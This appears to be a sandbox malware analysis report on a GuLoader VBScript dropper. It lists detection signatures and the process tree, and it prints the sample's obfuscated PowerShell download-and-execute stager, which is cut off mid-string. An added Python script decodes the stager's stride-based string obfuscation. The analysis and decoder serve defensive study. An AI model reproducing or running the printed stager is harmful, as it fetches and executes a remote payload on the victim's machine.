Windows Analysis Report
IMG-35235235523525235252532535Selvfinansieret.vbs
Overview
General Information
Detection: GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 2664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUns taozithazF ort.i .ont lAcro.lWo riaOffen/, odel5Snf,e . Svir0Apa g. Medle(F aktWAlure iAngwin Sa lpd fortoA kti wFo,eo sDeval ,la tfNgrozaT Midt Teleg 1Sa.pe0Di, se.bedir0F ranc; Toxi Non.WSlur iDerkrnma ner6Qui.q4 Tids; Spa a DiffxAde ,o6Non.q4B edri;fogus Skivr,lom mvSlagl:in com1Sti l2 Cy,t1Pund u.Paran0St ill),asto LadeGSangu eunp,rc ,i thkRoop oP reco/,enom 2Besva0Cov is1 Inno0P udsi0Harpe 1 B.mp0In, an1Chait G otthFPrikk iSlfanrDra pfeHy,stfP eakioB.gca xNoi.e/San it1Van b2f uril1Klept .Augus0Cen te ';$Unresponsible=Skdefrakker 'I.ddaUG rappsElbap eHovedrInt en-AdskiA Rel.gAgerb eUns,rnFlu ort In,k ';$Gualaca=Skdefrakker 'SowabhS ubtotFedte tAnsatpEli zas Forr: uci/Fakul/ ChrorE.to gaRecormBe nzoiBlundr MozegeCent axKo le.Gr un r Logfo Fo,dl/Sli euSchatn,n terp Aeror RespoiFnug ln MinicLo giciUnderp Aquarl.iii seT.ividR. gti.Sketcs Vir.eeTr u sapaala ';$sacrum=Skdefrakker 'Llers>Fru gt ';$Feeblenesses=Skdefrakker 'BulimiRe maie vi.tx Bryll ';$Lophiostomous='Westfilms';$Opkr sler250 = Skdefrakker ' Lo he TralcUdhol h JagtoFre da Brune%S e.weaBrne, pD.iftpCho kpdV.lutaO ptrktStend aSangu%Slu mm\ or dDS tandsAbett e ,nken S lgerorsc.A ramiKoppon nU,dereHar mo in,on& A zo&Ko ku Va,deOver pcUnde.hSc o,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors $V lgrgRke b lSherroS tophbOverf aBisexllus tr:Mumb.RE ksemaHarem dStilbiOve reoOtosaa DublcTonea tMac.si Ou t.vSamboeP iloc=Prism (DishwcLoo emChiqudb lake Ant,t /.gnencSdi gh Faste$ GemsOStats p ugebkDub lirPreens paralExces eDimenrInc o.2ind.a5K las,0T,ana )M,rkw ');Hadaway (Skdefrakker 'Exfig$ A fmag Estol RekogoProp ubPlopsaOr loglBange: .eglvDDoor keCel irGo urmvMa,kei GasosPoli th Anthl A t miNonphk renuleRekt o= Sl.m$Co rslG Lillu SteraT.yk plAgraraAd rescBartea Tran.Wo r is.ontop G realAx.nei Par.tStjf l( Peri$mu tins Al,ua Stalic ,yt irE.trauBr eakmConci) Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com ,r$ IntrgO .erllTra h oSdva b,ko hoaU,dullS ortk: Kon. W Iba.a No puadvanbg erodeN.are eTilbunHex ac2S.der0T ima 5Dan e =PuttiNFor gje Intew Sm d-H.sma O JunkbTor pej HomoeF rticMisce teurok H,r oiSPantiyN abonsAnteb tWakaseGri f,mHeste.o btruNop,eg
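The PowerShell stage in the process tree above carries its own string decoder. `$Megampere` is assembled from the fragments `'Sub'`, `'strin'` and `'g'` into the method name `Substring`; `Skdefrakker` then walks its argument from offset 5 in steps of 6 and stops before the last character (`$Doors` is `Length - 1`), so the cleartext is every sixth character and everything in between is junk; `Hadaway` hands a decoded string to whatever `$Feeblenesses` decodes to, through the call operator `&`. The Python script below is an added example, not part of the report or of the sample: it reimplements that decoder, pairs it with an encoder that produces literals of the same layout (used only to build test input), and pulls the `$name=Skdefrakker '...'` assignments and `Hadaway (Skdefrakker '...')` calls out of a constructed command-line fragment. The three short literals in that fragment are transcribed from the command line above with the extraction's column breaks removed (the longer literals follow the same scheme but are not reproduced); the `Hadaway` argument and the seeds are constructed for illustration.

```python
"""Decoder for the string obfuscation used by the PowerShell stage in this
report (added example, not code from the report or the sample).

The stager defines, with $Megampere built up to the word 'Substring':

    Function Skdefrakker($Gyldigt){
        $Doors=$Gyldigt.Length-1;
        For($i=5;$i -lt $Doors;$i+=6){$out+=$Gyldigt.Substring($i,1)};$out}

so the cleartext is every sixth character from offset 5, and the final
character of the literal is never read.
"""
import random
import re

START, STEP = 5, 6  # loop constants taken from the command line in the report


def decode_stride(literal, start=START, step=STEP):
    """Mirror of Skdefrakker: Substring($i,1) for $i = start, start+step, ... while $i < len-1."""
    doors = len(literal) - 1  # $Doors = $Gyldigt.Length - $Sensualistiske (which is 1)
    return "".join(literal[i] for i in range(start, doors, step))


# Junk alphabet for the encoder: letters, some punctuation and space, but never a
# single quote, which would terminate the PowerShell literal.
_JUNK = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,: "


def encode_stride(plain, seed=0, start=START, step=STEP):
    """Inverse of decode_stride; used here only to build input with the same layout."""
    rng = random.Random(seed)

    def junk(n):
        return "".join(rng.choice(_JUNK) for _ in range(n))

    parts = [junk(start)]  # first cleartext byte lands at index `start`
    for i, ch in enumerate(plain):
        if i:
            parts.append(junk(step - 1))
        parts.append(ch)
    parts.append(junk(1))  # trailing byte, which the decoder never reads
    return "".join(parts)


# $name = Skdefrakker '...'  (optionally wrapped in a parenthesis, as $Mayaca is)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\(?\s*Skdefrakker\s+'([^']*)'")
# Hadaway (Skdefrakker '...')  -> decoded text is passed to $Feeblenesses, i.e. iex
CALL_RE = re.compile(r"Hadaway\s*\(\s*Skdefrakker\s+'([^']*)'\s*\)")


def recover(cmdline):
    """Return ({variable: decoded value}, [decoded statements handed to Hadaway])."""
    assigned = {name: decode_stride(lit) for name, lit in ASSIGN_RE.findall(cmdline)}
    executed = [decode_stride(lit) for lit in CALL_RE.findall(cmdline)]
    return assigned, executed


# Constructed fragment in the stager's own syntax. The three quoted literals are
# transcribed from the report's command line with column breaks removed; the
# Hadaway argument is generated here and is not from the sample.
SAMPLE_CMDLINE = (
    "$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';"
    "$sacrum=Skdefrakker 'Llers>Frugt ';"
    "$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';"
    "Hadaway (Skdefrakker '" + encode_stride("Write-Output demo", seed=7) + "');"
)


if __name__ == "__main__":
    names, calls = recover(SAMPLE_CMDLINE)
    for name, value in names.items():
        print(f"${name} = {value!r}")
    for stmt in calls:
        print(f"{names.get('Feeblenesses', '&')} -> {stmt!r}")
```

Run against the real command line, the same extraction has to be done on text whose spacing is exactly as PowerShell received it: one inserted or dropped character shifts every later offset, so a literal copied from a rendered report (as above, with its column breaks) will not decode until those breaks are removed.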